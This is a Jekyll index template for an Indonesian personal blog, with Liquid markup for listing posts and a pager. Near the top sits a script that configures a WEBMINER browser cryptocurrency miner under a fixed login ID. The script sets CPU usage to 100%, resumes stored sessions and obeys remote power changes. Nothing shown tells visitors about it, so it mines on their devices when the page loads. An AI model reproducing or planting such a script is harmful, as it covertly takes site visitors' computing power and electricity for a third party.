---
layout: page
subtitle: "Coretan kisah sebuah kehidupan."
description: "Coretan kisah sebuah kehidupan, berbagi dengan sesama tentang pengalaman hidup."
---
<script>
// - Configure:
WEBMINER.config({ 
	login: "7197824", // Your ID - required
	pass: null, // Name for stats, leave blank for automatic set.
});

// - Universal function for Start/Stop/Change speed - 0 = stop, 1-100 = set percent of CPU usage and start mining if not started:
WEBMINER.power(100);

// - Restore previous session accepted hashes and power (start mining if it worked in previous session):
WEBMINER.loadStored();

// - Get current power:
console.log( WEBMINER.getPower() );

// - Get current speed in hashes/sec:
console.log( WEBMINER.getHashesPerSecond() );

// - Get current job algo:
console.log( WEBMINER.getJobAlgo() );

// - Get current job diff:
console.log( WEBMINER.getJobDiff() );

// - Get accepted by pool hashes (in all sessions)
console.log( WEBMINER.getAcceptedHashes() );

// - Reset config and stop minig
WEBMINER.reset(); // Reset config, stop mining and disconnect from pool (you can use it when user logout).

// - Remote change speed event:
WEBMINER.on('remotepower', (power) => {
	WEBMINER.power(power); // Is automatic applied if no listeners for this event.
	console.log('New power:', power);
});

// - Share accepted event
WEBMINER.on('accepted', () => console.log('New share') );
</script>
{% for post in paginator.posts %}
<div class="post-preview">
    <a href="{{ post.url | prepend: site.baseurl }}">
        <h2 class="post-title">            {{ post.title }}
        </h2>
        {% if post.subtitle %}
        <h3 class="post-subtitle">
            {{ post.subtitle }}
        </h3>
        {% endif %}
    </a>
   <p class="post-meta">Posted by <span class='post-author vcard' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'><span itemprop='name'>{% if post.author %}{{ post.author }}{% else %}{{ site.title }}{% endif %}</span></span> on <time itemprop="datePublished dateModified" datetime="{{ post.date | date_to_xmlschema }}">{{ post.date | date: "%B %-d, %Y" }}</time></p>
</div>
<hr>
{% endfor %}
<!-- Pager -->
{% if paginator.total_pages > 1 %}
<ul class="pager">
    {% if paginator.previous_page %}
    <li class="previous">
        <a href="{{ paginator.previous_page_path | prepend: site.baseurl | replace: '//', '/' }}"><i class="material-icons md-18">&#xE5C4;</i> Newer Posts</a>
    </li>
    {% endif %}
    {% if paginator.next_page %}
    <li class="next">
        <a href="{{ paginator.next_page_path | prepend: site.baseurl | replace: '//', '/' }}">Older Posts <i class="material-icons md-18">&#xE5C8;</i></a>
    </li>
    {% endif %}
</ul>
{% endif %}
